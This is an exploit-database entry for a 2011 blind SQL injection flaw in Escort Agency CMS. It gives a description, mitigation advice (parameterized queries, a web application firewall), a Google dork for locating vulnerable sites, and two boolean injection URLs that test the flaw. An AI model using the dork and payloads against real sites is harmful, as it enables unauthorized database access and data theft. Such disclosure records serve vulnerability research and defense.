header-logo
Suggest Exploit
vendor:
Escort Agency CMS
by:
NoNameMT
8.8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Escort Agency CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

Escort Agency CMS Blind SQL Injection Vunerability

The vulnerability exists in Escort Agency CMS, which is a web application developed by Escort Website Design. It allows an attacker to inject malicious SQL queries into the application, which can be used to extract sensitive information from the database. The vulnerability can be exploited by sending a specially crafted HTTP request containing a malicious SQL query to the application. The application will then execute the query and return the results to the attacker.

Mitigation:

The application should be configured to use parameterized queries to prevent SQL injection attacks. Additionally, the application should be configured to use a web application firewall to detect and block malicious requests.
Source

Exploit-DB raw data:

# Exploit Title: Escort Agency CMS Blind SQL Injection Vunerability
# Google Dork: "Powered by Escort agency CMS - Escort agency webdesign"
# Platform: php, webapp
# Date: 10.02.2011
# Author: NoNameMT
# Software Link:
http://www.escortwebsitedesign.co.uk/escort-agency-cms/index.php
# Price: 299 £ per month
# Tested on: Windows 7
# Mail: nonamemt@gmail.com
# Homepage: http://nonamemt.us

# Exploit:
http://localhost/agency5/Alexa,509+and+1=1--+ //True
http://localhost/agency5/Alexa,509+and+1=0--+ //False

# Greetings:
4004-security-project.com, J0hn.X3r, TamCore, bursali, theeddy42,
Nightmare_FH

Navigation

Suggest Exploit

Services By CQR